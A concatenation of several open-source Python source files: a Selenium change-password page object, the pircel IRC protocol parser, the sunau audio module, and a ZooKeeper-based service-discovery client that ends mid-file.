def change_password(self, current, new):
self.fill_field_element(
current, self.modal.current_password)
self.fill_field_element(
new, self.modal.new_password)
self.fill_field_element(
new, self.modal.confirm_new_password)
self.modal.click_on_change_button()
def reset_to_default_password(self, current):
if self.topbar.user.text == self.conf.identity.admin_username:
return self.change_password(current,
self.conf.identity.admin_password)
else:
return self.change_password(current,
self.conf.identity.password)
class ChangePasswordModal(pageobject.PageObject):
_current_password_locator = (by.By.CSS_SELECTOR,
'input#id_current_password')
_new_password_locator = (by.By.CSS_SELECTOR,
'input#id_new_password')
_confirm_new_password_locator = (by.By.CSS_SELECTOR,
'input#id_confirm_password')
_change_submit_button_locator = (by.By.CSS_SELECTOR,
'div.modal-footer button.btn')
@property
def current_password(self):
return self.get_element(*self._current_password_locator)
@property
def new_password(self):
return self.get_element(*self._new_password_locator)
@property
def confirm_new_password(self):
return self.get_element(*self._confirm_new_password_locator)
@property
def change_button(self):
return self.get_element(*self._change_submit_button_locator)
def click_on_change_button(self):
self.change_button.click()
| apache-2.0 |
possel/pircel | pircel/protocol.py | 1 | 15500 | #!/usr/bin/env python3
# -*- coding: utf8 -*-
"""
pircel.protocol
---------------
This module defines functions and objects for interacting with an IRC server including:
- parsing IRC protocol messages received from the server
- generating IRC protocol messages to be sent back to the server
- a callback-based API for interacting with these that should be agnostic to the multiprocessing mechanism used
(e.g. it'll work with both asyncio and tornado if you set them up right; though twisted won't work at the moment
because it doesn't support python 3)
"""
import logging
import chardet
import pircel
import pircel.signals
logger = logging.getLogger(__name__)
verbatim_logger = logging.getLogger('{}.verbatim'.format(__name__))
signal_factory = pircel.signals.namespace('irc_protocol')
class Error(pircel.Error):
""" Root exception for protocol parsing errors. """
class UnknownNumericCommandError(Error):
""" Exception thrown when a numeric command is given but no symbolic version can be found. """
class UnknownModeCommandError(Error):
""" Exception thrown on unknown mode change command. """
def split_irc_line(s):
"""Breaks a message from an IRC server into its prefix, command, and arguments.
Copied straight from twisted, license and copyright for this function follows:
Copyright (c) 2001-2014
Allen Short
Andy Gayton
Andrew Bennetts
Antoine Pitrou
Apple Computer, Inc.
Ashwini Oruganti
Benjamin Bruheim
Bob Ippolito
Canonical Limited
Christopher Armstrong
David Reid
Donovan Preston
Eric Mangold
Eyal Lotem
Google Inc.
Hybrid Logic Ltd.
Hynek Schlawack
Itamar Turner-Trauring
James Knight
Jason A. Mobarak
Jean-Paul Calderone
Jessica McKellar
Jonathan Jacobs
Jonathan Lange
Jonathan D. Simms
Jürgen Hermann
Julian Berman
Kevin Horn
Kevin Turner
Laurens Van Houtven
Mary Gardiner
Matthew Lefkowitz
Massachusetts Institute of Technology
Moshe Zadka
Paul Swartz
Pavel Pergamenshchik
Ralph Meijer
Richard Wall
Sean Riley
Software Freedom Conservancy
Travis B. Hartwell
Thijs Triemstra
Thomas Herve
Timothy Allen
Tom Prince
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
prefix = ''
trailing = []
if not s:
# Raise an exception of some kind
pass
if s[0] == ':':
prefix, s = s[1:].split(' ', 1)
if s.find(' :') != -1:
s, trailing = s.split(' :', 1)
args = s.split()
args.append(trailing)
else:
args = s.split()
command = args.pop(0)
return prefix, command, args
def parse_identity(who):
""" Extract the parts out of an IRC user identifier string. """
nick, rest = who.split('!')
username, host = rest.split('@')
if username.startswith('~'):
username = username[1:]
return nick, username, host
def get_symbolic_command(command):
""" Normalizes both numeric and symbolic commands into just symbolic commands. """
if command.isdecimal():
try:
return numeric_to_symbolic[command]
except KeyError as e:
raise UnknownNumericCommandError("No numeric command found: '{}'".format(command)) from e
else:
return command
def decode(line):
""" Attempts to decode the line with utf8 but falls back to chardet otherwise. """
try:
line = str(line, encoding='utf8')
except UnicodeDecodeError:
logger.debug('UTF8 decode failed, bytes: %s', line)
encoding = chardet.detect(line)['encoding']
logger.debug('Tried autodetecting and got %s, decoding now', encoding)
line = str(line, encoding=encoding)
except TypeError as e:
if e.args[0] != 'decoding str is not supported':
raise
return line
def parse_line(line):
""" Normalizes the line from the server and splits it into component parts. """
line = decode(line)
line = line.strip()
return split_irc_line(line)
class IRCServerHandler:
def __init__(self, identity):
""" Protocol parser (and response generator) for an IRC server.
Args:
identity (User object): "Our" nick and user name etc.
"""
self._write = None
self.identity = identity
# Default values
self.motd = ''
@property
def _user_string(self):
return ':{}!~{}@localhost'.format(self.identity.nick, self.identity.username)
# =========================================================================
# Parsing and "reading"
# ---------------------
#
# Methods that result from a new input from the IRC server.
# =========================================================================
def handle_line(self, line):
verbatim_logger.debug(line)
# Parse the line
prefix, command, args = parse_line(line)
try:
symbolic_command = get_symbolic_command(command)
except UnknownNumericCommandError:
self.log_unhandled(line)
return
# local callbacks deal with the protocol stuff
try:
handler_name = 'on_{}'.format(symbolic_command.lower())
handler = getattr(self, handler_name)
except AttributeError:
handled = False
else:
handler(prefix, *args)
handled = True
# user callbacks do whatever they want them to do
signal = signal_factory(symbolic_command.lower())
signal.send(self, prefix=prefix, args=args)
if signal.receivers:
handled = True
if not handled:
self.log_unhandled(line)
def log_unhandled(self, line):
""" Called when we encounter a command we either don't know or don't have a handler for.
Method rather than function because I might later make it send debug logging over IRC sometimes.
"""
logger.warning('Unhandled: %s', line.decode().rstrip())
# =========================================================================
# =========================================================================
# Generating and "writing"
# ------------------------
#
# Methods that ultimately call self._write or are used in other methods in
# this section.
#
# TODO: Should public API functions like `who` and `connect` be in here? Is
# this an appropriate description for this section?
# =========================================================================
@property # Why is this a property?
def write_function(self):
return self._write
@write_function.setter
def write_function(self, new_write_function):
self._write = new_write_function
def pong(self, value):
self._write('PONG :{}'.format(value))
def connect(self):
self._write('NICK {}'.format(self.identity.nick))
self._write('USER {} 0 * :{}'.format(self.identity.username, self.identity.realname))
def who(self, mask):
self._write('WHO {}'.format(mask))
def join(self, channel, password=None):
logger.debug('Joining %s', channel)
if password:
self._write('JOIN {} {}'.format(channel, password))
else:
self._write('JOIN {}'.format(channel))
def part(self, channel):
self._write('PART {}'.format(channel))
def quit(self, message):
self._write('QUIT :{}'.format(message))
def _split_line_channel_command(self, command, channel, message):
if not isinstance(message, (str, bytes)):
message = str(message)
for line in message.split('\n'):
command = '{} {} :{}'.format(command, channel, line)
self._write(command)
self.handle_line('{} {}'.format(self._user_string, command))
def send_message(self, channel, message):
self._split_line_channel_command('PRIVMSG', channel, message)
def send_notice(self, channel, message):
self._split_line_channel_command('NOTICE', channel, message)
def send_ping(self, value):
self._write('PING {}'.format(value))
def change_nick(self, new_nick):
self._write('NICK {}'.format(new_nick))
self.identity.nick = new_nick
# =========================================================================
# =========================================================================
# Callback API
# ------------
#
# The primary intended mechanism for interacting with this module, a user
# will instantiate this class then add callbacks where they want.
#
# A callback is any old callable, details in the docstring for
# `add_callback`.
# =========================================================================
def add_callback(self, signal, callback, weak=True):
""" Attach a function to be called on an IRC command (specified symbolically).
The function will be called with the following args:
* The calling IRCServerHandler object
* The prefix of the command (usually who it's from?)
* The remaining arguments from the command
For example the `join` signal will be called with `(self, who, channel)`.
"""
signal_factory(signal).connect(callback, sender=self, weak=weak)
def remove_callback(self, signal, callback):
signal_factory(signal).disconnect(callback, sender=self)
# =========================================================================
# =========================================================================
# Default handlers
# ----------------
#
# So far just ping responding. In future might handle protocol negotiation
# bits like character encoding and the like.
# =========================================================================
def on_ping(self, prefix, token, *args):
logger.debug('Ping received: %s, %s', prefix, token)
self.pong(token)
# =========================================================================
symbolic_to_numeric = {
"RPL_WELCOME": '001',
"RPL_YOURHOST": '002',
"RPL_CREATED": '003',
"RPL_MYINFO": '004',
"RPL_ISUPPORT": '005',
"RPL_BOUNCE": '010',
"RPL_STATSCONN": '250',
"RPL_LOCALUSERS": '265',
"RPL_GLOBALUSERS": '266',
"RPL_USERHOST": '302',
"RPL_ISON": '303',
"RPL_AWAY": '301',
"RPL_UNAWAY": '305',
"RPL_NOWAWAY": '306',
"RPL_WHOISUSER": '311',
"RPL_WHOISSERVER": '312',
"RPL_WHOISOPERATOR": '313',
"RPL_WHOISIDLE": '317',
"RPL_ENDOFWHOIS": '318',
"RPL_WHOISCHANNELS": '319',
"RPL_WHOWASUSER": '314',
"RPL_ENDOFWHOWAS": '369',
"RPL_LISTSTART": '321',
"RPL_LIST": '322',
"RPL_LISTEND": '323',
"RPL_UNIQOPIS": '325',
"RPL_CHANNELMODEIS": '324',
"RPL_NOTOPIC": '331',
"RPL_TOPIC": '332',
"RPL_TOPICWHOTIME": '333',
"RPL_INVITING": '341',
"RPL_SUMMONING": '342',
"RPL_INVITELIST": '346',
"RPL_ENDOFINVITELIST": '347',
"RPL_EXCEPTLIST": '348',
"RPL_ENDOFEXCEPTLIST": '349',
"RPL_VERSION": '351',
"RPL_WHOREPLY": '352',
"RPL_ENDOFWHO": '315',
"RPL_NAMREPLY": '353',
"RPL_ENDOFNAMES": '366',
"RPL_LINKS": '364',
"RPL_ENDOFLINKS": '365',
"RPL_BANLIST": '367',
"RPL_ENDOFBANLIST": '368',
"RPL_INFO": '371',
"RPL_ENDOFINFO": '374',
"RPL_MOTDSTART": '375',
"RPL_MOTD": '372',
"RPL_ENDOFMOTD": '376',
"RPL_YOUREOPER": '381',
"RPL_REHASHING": '382',
"RPL_YOURESERVICE": '383',
"RPL_TIME": '391',
"RPL_USERSSTART": '392',
"RPL_USERS": '393',
"RPL_ENDOFUSERS": '394',
"RPL_NOUSERS": '395',
"RPL_TRACELINK": '200',
"RPL_TRACECONNECTING": '201',
"RPL_TRACEHANDSHAKE": '202',
"RPL_TRACEUNKNOWN": '203',
"RPL_TRACEOPERATOR": '204',
"RPL_TRACEUSER": '205',
"RPL_TRACESERVER": '206',
"RPL_TRACESERVICE": '207',
"RPL_TRACENEWTYPE": '208',
"RPL_TRACECLASS": '209',
"RPL_TRACERECONNECT": '210',
"RPL_TRACELOG": '261',
"RPL_TRACEEND": '262',
"RPL_STATSLINKINFO": '211',
"RPL_STATSCOMMANDS": '212',
"RPL_ENDOFSTATS": '219',
"RPL_STATSUPTIME": '242',
"RPL_STATSOLINE": '243',
"RPL_UMODEIS": '221',
"RPL_SERVLIST": '234',
"RPL_SERVLISTEND": '235',
"RPL_LUSERCLIENT": '251',
"RPL_LUSEROP": '252',
"RPL_LUSERUNKNOWN": '253',
"RPL_LUSERCHANNELS": '254',
"RPL_LUSERME": '255',
"RPL_ADMINME": '256',
"RPL_ADMINLOC": '257',
"RPL_ADMINLOC": '258',
"RPL_ADMINEMAIL": '259',
"RPL_TRYAGAIN": '263',
"ERR_NOSUCHNICK": '401',
"ERR_NOSUCHSERVER": '402',
"ERR_NOSUCHCHANNEL": '403',
"ERR_CANNOTSENDTOCHAN": '404',
"ERR_TOOMANYCHANNELS": '405',
"ERR_WASNOSUCHNICK": '406',
"ERR_TOOMANYTARGETS": '407',
"ERR_NOSUCHSERVICE": '408',
"ERR_NOORIGIN": '409',
"ERR_NORECIPIENT": '411',
"ERR_NOTEXTTOSEND": '412',
"ERR_NOTOPLEVEL": '413',
"ERR_WILDTOPLEVEL": '414',
"ERR_BADMASK": '415',
"ERR_UNKNOWNCOMMAND": '421',
"ERR_NOMOTD": '422',
"ERR_NOADMININFO": '423',
"ERR_FILEERROR": '424',
"ERR_NONICKNAMEGIVEN": '431',
"ERR_ERRONEUSNICKNAME": '432',
"ERR_NICKNAMEINUSE": '433',
"ERR_NICKCOLLISION": '436',
"ERR_UNAVAILRESOURCE": '437',
"ERR_USERNOTINCHANNEL": '441',
"ERR_NOTONCHANNEL": '442',
"ERR_USERONCHANNEL": '443',
"ERR_NOLOGIN": '444',
"ERR_SUMMONDISABLED": '445',
"ERR_USERSDISABLED": '446',
"ERR_NOTREGISTERED": '451',
"ERR_NEEDMOREPARAMS": '461',
"ERR_ALREADYREGISTRED": '462',
"ERR_NOPERMFORHOST": '463',
"ERR_PASSWDMISMATCH": '464',
"ERR_YOUREBANNEDCREEP": '465',
"ERR_YOUWILLBEBANNED": '466',
"ERR_KEYSET": '467',
"ERR_CHANNELISFULL": '471',
"ERR_UNKNOWNMODE": '472',
"ERR_INVITEONLYCHAN": '473',
"ERR_BANNEDFROMCHAN": '474',
"ERR_BADCHANNELKEY": '475',
"ERR_BADCHANMASK": '476',
"ERR_NOCHANMODES": '477',
"ERR_BANLISTFULL": '478',
"ERR_NOPRIVILEGES": '481',
"ERR_CHANOPRIVSNEEDED": '482',
"ERR_CANTKILLSERVER": '483',
"ERR_RESTRICTED": '484',
"ERR_UNIQOPPRIVSNEEDED": '485',
"ERR_NOOPERHOST": '491',
"ERR_NOSERVICEHOST": '492',
"ERR_UMODEUNKNOWNFLAG": '501',
"ERR_USERSDONTMATCH": '502',
}
numeric_to_symbolic = {v: k for k, v in symbolic_to_numeric.items()}
| bsd-3-clause |
ZHAW-INES/rioxo-uClinux-dist | user/python/python-2.4.4/Lib/sunau.py | 82 | 16515 | """Stuff to parse Sun and NeXT audio files.
An audio file consists of a header followed by the data. The structure
of the header is as follows.
+---------------+
| magic word |
+---------------+
| header size |
+---------------+
| data size |
+---------------+
| encoding |
+---------------+
| sample rate |
+---------------+
| # of channels |
+---------------+
| info |
| |
+---------------+
The magic word consists of the 4 characters '.snd'. Apart from the
info field, all header fields are 4 bytes in size. They are all
32-bit unsigned integers encoded in big-endian byte order.
The header size really gives the start of the data.
The data size is the physical size of the data. From the other
parameters the number of frames can be calculated.
The encoding gives the way in which audio samples are encoded.
Possible values are listed below.
The info field currently consists of an ASCII string giving a
human-readable description of the audio file. The info field is
padded with NUL bytes to the header size.
Usage.
Reading audio files:
f = sunau.open(file, 'r')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods read(), seek(), and close().
When the setpos() and rewind() methods are not used, the seek()
method is not necessary.
This returns an instance of a class with the following public methods:
getnchannels() -- returns number of audio channels (1 for
mono, 2 for stereo)
getsampwidth() -- returns sample width in bytes
getframerate() -- returns sampling frequency
getnframes() -- returns number of audio frames
getcomptype() -- returns compression type ('NONE' or 'ULAW')
getcompname() -- returns human-readable version of
compression type ('not compressed' matches 'NONE')
getparams() -- returns a tuple consisting of all of the
above in the above order
getmarkers() -- returns None (for compatibility with the
aifc module)
getmark(id) -- raises an error since the mark does not
exist (for compatibility with the aifc module)
readframes(n) -- returns at most n frames of audio
rewind() -- rewind to the beginning of the audio stream
setpos(pos) -- seek to the specified position
tell() -- return the current position
close() -- close the instance (make it unusable)
The position returned by tell() and the position given to setpos()
are compatible and have nothing to do with the actual position in the
file.
The close() method is called automatically when the class instance
is destroyed.
Writing audio files:
f = sunau.open(file, 'w')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods write(), tell(), seek(), and
close().
This returns an instance of a class with the following public methods:
setnchannels(n) -- set the number of channels
setsampwidth(n) -- set the sample width
setframerate(n) -- set the frame rate
setnframes(n) -- set the number of frames
setcomptype(type, name)
-- set the compression type and the
human-readable compression type
setparams(tuple)-- set all parameters at once
tell() -- return current position in output file
writeframesraw(data)
-- write audio frames without pathing up the
file header
writeframes(data)
-- write audio frames and patch up the file header
close() -- patch up the file header and close the
output file
You should set the parameters before the first writeframesraw or
writeframes. The total number of frames does not need to be set,
but when it is set to the correct value, the header does not have to
be patched up.
It is best to first set all parameters, perhaps possibly the
compression type, and then write audio frames using writeframesraw.
When all frames have been written, either call writeframes('') or
close() to patch up the sizes in the header.
The close() method is called automatically when the class instance
is destroyed.
"""
# from <multimedia/audio_filehdr.h>
AUDIO_FILE_MAGIC = 0x2e736e64
AUDIO_FILE_ENCODING_MULAW_8 = 1
AUDIO_FILE_ENCODING_LINEAR_8 = 2
AUDIO_FILE_ENCODING_LINEAR_16 = 3
AUDIO_FILE_ENCODING_LINEAR_24 = 4
AUDIO_FILE_ENCODING_LINEAR_32 = 5
AUDIO_FILE_ENCODING_FLOAT = 6
AUDIO_FILE_ENCODING_DOUBLE = 7
AUDIO_FILE_ENCODING_ADPCM_G721 = 23
AUDIO_FILE_ENCODING_ADPCM_G722 = 24
AUDIO_FILE_ENCODING_ADPCM_G723_3 = 25
AUDIO_FILE_ENCODING_ADPCM_G723_5 = 26
AUDIO_FILE_ENCODING_ALAW_8 = 27
# from <multimedia/audio_hdr.h>
AUDIO_UNKNOWN_SIZE = 0xFFFFFFFFL # ((unsigned)(~0))
_simple_encodings = [AUDIO_FILE_ENCODING_MULAW_8,
AUDIO_FILE_ENCODING_LINEAR_8,
AUDIO_FILE_ENCODING_LINEAR_16,
AUDIO_FILE_ENCODING_LINEAR_24,
AUDIO_FILE_ENCODING_LINEAR_32,
AUDIO_FILE_ENCODING_ALAW_8]
class Error(Exception):
pass
def _read_u32(file):
x = 0L
for i in range(4):
byte = file.read(1)
if byte == '':
raise EOFError
x = x*256 + ord(byte)
return x
def _write_u32(file, x):
data = []
for i in range(4):
d, m = divmod(x, 256)
data.insert(0, m)
x = d
for i in range(4):
file.write(chr(int(data[i])))
class Au_read:
def __init__(self, f):
if type(f) == type(''):
import __builtin__
f = __builtin__.open(f, 'rb')
self.initfp(f)
def __del__(self):
if self._file:
self.close()
def initfp(self, file):
self._file = file
self._soundpos = 0
magic = int(_read_u32(file))
if magic != AUDIO_FILE_MAGIC:
raise Error, 'bad magic number'
self._hdr_size = int(_read_u32(file))
if self._hdr_size < 24:
raise Error, 'header size too small'
if self._hdr_size > 100:
raise Error, 'header size ridiculously large'
self._data_size = _read_u32(file)
if self._data_size != AUDIO_UNKNOWN_SIZE:
self._data_size = int(self._data_size)
self._encoding = int(_read_u32(file))
if self._encoding not in _simple_encodings:
raise Error, 'encoding not (yet) supported'
if self._encoding in (AUDIO_FILE_ENCODING_MULAW_8,
AUDIO_FILE_ENCODING_ALAW_8):
self._sampwidth = 2
self._framesize = 1
elif self._encoding == AUDIO_FILE_ENCODING_LINEAR_8:
self._framesize = self._sampwidth = 1
elif self._encoding == AUDIO_FILE_ENCODING_LINEAR_16:
self._framesize = self._sampwidth = 2
elif self._encoding == AUDIO_FILE_ENCODING_LINEAR_24:
self._framesize = self._sampwidth = 3
elif self._encoding == AUDIO_FILE_ENCODING_LINEAR_32:
self._framesize = self._sampwidth = 4
else:
raise Error, 'unknown encoding'
self._framerate = int(_read_u32(file))
self._nchannels = int(_read_u32(file))
self._framesize = self._framesize * self._nchannels
if self._hdr_size > 24:
self._info = file.read(self._hdr_size - 24)
for i in range(len(self._info)):
if self._info[i] == '\0':
self._info = self._info[:i]
break
else:
self._info = ''
def getfp(self):
return self._file
def getnchannels(self):
return self._nchannels
def getsampwidth(self):
return self._sampwidth
def getframerate(self):
return self._framerate
def getnframes(self):
if self._data_size == AUDIO_UNKNOWN_SIZE:
return AUDIO_UNKNOWN_SIZE
if self._encoding in _simple_encodings:
return self._data_size / self._framesize
return 0 # XXX--must do some arithmetic here
def getcomptype(self):
if self._encoding == AUDIO_FILE_ENCODING_MULAW_8:
return 'ULAW'
elif self._encoding == AUDIO_FILE_ENCODING_ALAW_8:
return 'ALAW'
else:
return 'NONE'
def getcompname(self):
if self._encoding == AUDIO_FILE_ENCODING_MULAW_8:
return 'CCITT G.711 u-law'
elif self._encoding == AUDIO_FILE_ENCODING_ALAW_8:
return 'CCITT G.711 A-law'
else:
return 'not compressed'
def getparams(self):
return self.getnchannels(), self.getsampwidth(), \
self.getframerate(), self.getnframes(), \
self.getcomptype(), self.getcompname()
def getmarkers(self):
return None
def getmark(self, id):
raise Error, 'no marks'
def readframes(self, nframes):
if self._encoding in _simple_encodings:
if nframes == AUDIO_UNKNOWN_SIZE:
data = self._file.read()
else:
data = self._file.read(nframes * self._framesize * self._nchannels)
if self._encoding == AUDIO_FILE_ENCODING_MULAW_8:
import audioop
data = audioop.ulaw2lin(data, self._sampwidth)
return data
return None # XXX--not implemented yet
def rewind(self):
self._soundpos = 0
self._file.seek(self._hdr_size)
def tell(self):
return self._soundpos
def setpos(self, pos):
if pos < 0 or pos > self.getnframes():
raise Error, 'position not in range'
self._file.seek(pos * self._framesize + self._hdr_size)
self._soundpos = pos
def close(self):
self._file = None
class Au_write:
def __init__(self, f):
if type(f) == type(''):
import __builtin__
f = __builtin__.open(f, 'wb')
self.initfp(f)
def __del__(self):
if self._file:
self.close()
def initfp(self, file):
self._file = file
self._framerate = 0
self._nchannels = 0
self._sampwidth = 0
self._framesize = 0
self._nframes = AUDIO_UNKNOWN_SIZE
self._nframeswritten = 0
self._datawritten = 0
self._datalength = 0
self._info = ''
self._comptype = 'ULAW' # default is U-law
def setnchannels(self, nchannels):
if self._nframeswritten:
raise Error, 'cannot change parameters after starting to write'
if nchannels not in (1, 2, 4):
raise Error, 'only 1, 2, or 4 channels supported'
self._nchannels = nchannels
def getnchannels(self):
if not self._nchannels:
raise Error, 'number of channels not set'
return self._nchannels
def setsampwidth(self, sampwidth):
if self._nframeswritten:
raise Error, 'cannot change parameters after starting to write'
if sampwidth not in (1, 2, 4):
raise Error, 'bad sample width'
self._sampwidth = sampwidth
def getsampwidth(self):
if not self._framerate:
raise Error, 'sample width not specified'
return self._sampwidth
def setframerate(self, framerate):
if self._nframeswritten:
raise Error, 'cannot change parameters after starting to write'
self._framerate = framerate
def getframerate(self):
if not self._framerate:
raise Error, 'frame rate not set'
return self._framerate
def setnframes(self, nframes):
if self._nframeswritten:
raise Error, 'cannot change parameters after starting to write'
if nframes < 0:
raise Error, '# of frames cannot be negative'
self._nframes = nframes
def getnframes(self):
return self._nframeswritten
def setcomptype(self, type, name):
if type in ('NONE', 'ULAW'):
self._comptype = type
else:
raise Error, 'unknown compression type'
def getcomptype(self):
return self._comptype
def getcompname(self):
if self._comptype == 'ULAW':
return 'CCITT G.711 u-law'
elif self._comptype == 'ALAW':
return 'CCITT G.711 A-law'
else:
return 'not compressed'
def setparams(self, (nchannels, sampwidth, framerate, nframes, comptype, compname)):
self.setnchannels(nchannels)
self.setsampwidth(sampwidth)
self.setframerate(framerate)
self.setnframes(nframes)
self.setcomptype(comptype, compname)
def getparams(self):
return self.getnchannels(), self.getsampwidth(), \
self.getframerate(), self.getnframes(), \
self.getcomptype(), self.getcompname()
def tell(self):
return self._nframeswritten
def writeframesraw(self, data):
self._ensure_header_written()
nframes = len(data) / self._framesize
if self._comptype == 'ULAW':
import audioop
data = audioop.lin2ulaw(data, self._sampwidth)
self._file.write(data)
self._nframeswritten = self._nframeswritten + nframes
self._datawritten = self._datawritten + len(data)
def writeframes(self, data):
self.writeframesraw(data)
if self._nframeswritten != self._nframes or \
self._datalength != self._datawritten:
self._patchheader()
def close(self):
self._ensure_header_written()
if self._nframeswritten != self._nframes or \
self._datalength != self._datawritten:
self._patchheader()
self._file.flush()
self._file = None
#
# private methods
#
def _ensure_header_written(self):
if not self._nframeswritten:
if not self._nchannels:
raise Error, '# of channels not specified'
if not self._sampwidth:
raise Error, 'sample width not specified'
if not self._framerate:
raise Error, 'frame rate not specified'
self._write_header()
def _write_header(self):
if self._comptype == 'NONE':
if self._sampwidth == 1:
encoding = AUDIO_FILE_ENCODING_LINEAR_8
self._framesize = 1
elif self._sampwidth == 2:
encoding = AUDIO_FILE_ENCODING_LINEAR_16
self._framesize = 2
elif self._sampwidth == 4:
encoding = AUDIO_FILE_ENCODING_LINEAR_32
self._framesize = 4
else:
raise Error, 'internal error'
elif self._comptype == 'ULAW':
encoding = AUDIO_FILE_ENCODING_MULAW_8
self._framesize = 1
else:
raise Error, 'internal error'
self._framesize = self._framesize * self._nchannels
_write_u32(self._file, AUDIO_FILE_MAGIC)
header_size = 25 + len(self._info)
header_size = (header_size + 7) & ~7
_write_u32(self._file, header_size)
if self._nframes == AUDIO_UNKNOWN_SIZE:
length = AUDIO_UNKNOWN_SIZE
else:
length = self._nframes * self._framesize
_write_u32(self._file, length)
self._datalength = length
_write_u32(self._file, encoding)
_write_u32(self._file, self._framerate)
_write_u32(self._file, self._nchannels)
self._file.write(self._info)
self._file.write('\0'*(header_size - len(self._info) - 24))
def _patchheader(self):
self._file.seek(8)
_write_u32(self._file, self._datawritten)
self._datalength = self._datawritten
self._file.seek(0, 2)
def open(f, mode=None):
if mode is None:
if hasattr(f, 'mode'):
mode = f.mode
else:
mode = 'rb'
if mode in ('r', 'rb'):
return Au_read(f)
elif mode in ('w', 'wb'):
return Au_write(f)
else:
raise Error, "mode must be 'r', 'rb', 'w', or 'wb'"
openfp = open
| gpl-2.0 |
ezbake/ezbake-common-python | discovery/lib/ezbake/discovery.py | 2 | 13534 | #!/usr/bin/env python
# Copyright (C) 2013-2014 Computer Sciences Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Register and locate services within ezDiscovery. """
import optparse
import sys
import time
from threading import RLock
from kazoo.client import KazooClient, NoNodeError
current_time_sec = lambda: int(round(time.time()))
class EphimeralDict(dict):
_instance = None
_rlock = RLock()
def __new__(cls, *args, **kwargs):
"""
Create the cache as a singleton.
:param cls:
:param args:
:param kwargs:
:return:
"""
with cls._rlock:
if getattr(cls, '_instance', None) is None:
cls._instance = super(EphimeralDict, cls).\
__new__(cls, *args, **kwargs)
return cls._instance
def __init__(self, ttl_secs=1200, *args, **kwargs):
"""
Initializes ExpiringCache
:param ttl_secs:
:return:
"""
super(EphimeralDict, self).__init__(*args, **kwargs)
self.ttl_secs = ttl_secs if not hasattr(self, 'ttl_secs') else self.ttl_secs
self._expires = getattr(self, '_expires', {})
self.rlock = self.__class__._rlock
def __setitem__(self, key, value):
"""
Set the value for the given key in the cache. Sets the key with the
ttl.
:param key:
:param value:
:return:
"""
with self.rlock:
self._expires[key] = current_time_sec() + self.ttl_secs
super(EphimeralDict, self).__setitem__(key, value)
def __getitem__(self, key):
"""
Get the value for the key in the cache.
:param key:
:return:
"""
self.prune(key)
return super(EphimeralDict, self).__getitem__(key)
def __contains__(self, k):
"""
Checks if item is in queue.
:param k:
:return:
"""
try:
self.prune(k)
except KeyError:
pass
return super(EphimeralDict, self).__contains__(k)
def __delitem__(self, key):
"""
Deletes the key from the dictionary.
:param key:
:return:
"""
with self.rlock:
del self._expires[key]
super(EphimeralDict, self).__delitem__(key)
def prune(self, key):
"""
Prunes the inner data dictionary to ensure the ephimeral nature of the
class. It raises a KeyError if the given key is not in the data
dictionary.
:param key:
:return:
"""
# determine if the key has expired
with self.rlock:
expires_ts = self._expires[key]
if expires_ts < current_time_sec():
del self[key]
def clear(self):
"""
Clears the dictionary
:return:
"""
with self.rlock:
for k in self.keys():
del self[k]
def clean(self):
"""
Cleans the contents of the dictionary, and starts from scratch.
"""
del self.__class__._instance
EphimeralDict()
class ServiceDiscoveryClient:
NAMESPACE = 'ezDiscovery'
COMMON_APP_NAME = 'common_services'
ENDPOINTS = 'endpoints'
SECURITY = 'security'
SECURITY_ID = 'security_id'
def __init__(self, hosts='localhost:2181'):
self.hosts = hosts
self.securityIdCache = EphimeralDict(1000)
def _connect(self):
"""Create a connection to Zookeeper for use in discovery calls."""
zk = KazooClient(hosts=self.hosts)
zk.start()
return zk
@staticmethod
def _disconnect(zk):
"""Disconnect from Zookeeper if there is a connection."""
if zk:
zk.stop()
zk.close()
def register_endpoint(self, app_name, service_name, host, port):
"""Register an endpoint with Zookeeper."""
zk = self._connect()
try:
zk.ensure_path('/'.join([
self.NAMESPACE,
app_name,
service_name,
self.ENDPOINTS,
host + ':' + str(port)
]))
finally:
self._disconnect(zk)
def register_common_endpoint(self, service_name, host, port):
"""Register a common endpoint under the default application name."""
self.register_endpoint(self.COMMON_APP_NAME, service_name, host, port)
def _recurse_deletion(self, zk, path_parts):
"""Moves up the tree of the given path parts deleting if empty.
NOTE: Will not delete path from root to endpoints (inclusively).
"""
if len(path_parts) > 4:
path = '/'.join(path_parts)
if zk.exists(path) and not len(zk.get_children(path)):
zk.delete(path)
self._recurse_deletion(zk, path_parts[:-1])
def unregister_endpoint(self, app_name, service_name, host, port):
"""Unregister and endpoint with Zookeeper."""
zk = self._connect()
try:
self._recurse_deletion(zk, [
self.NAMESPACE,
app_name,
service_name,
self.ENDPOINTS,
host + ':' + str(port)
])
finally:
self._disconnect(zk)
def unregister_common_endpoint(self, service_name, host='localhost',
port=2181):
"""Unregister a common endpoint under the default application name."""
self.unregister_endpoint(self.COMMON_APP_NAME, service_name, host,
port)
def _get_children(self, path):
"""Shortcut method to return the children on the given path."""
zk = self._connect()
children = []
try:
if zk.exists(path):
children = zk.get_children(path)
finally:
self._disconnect(zk)
return children
def get_applications(self):
"""Get a list of applications registered in Zookeeper."""
return self._get_children(self.NAMESPACE)
def get_services(self, app_name):
"""Get a list services by the given application name."""
return self._get_children('/'.join([self.NAMESPACE, app_name]))
def get_common_services(self):
"""Get a list services under the common application name."""
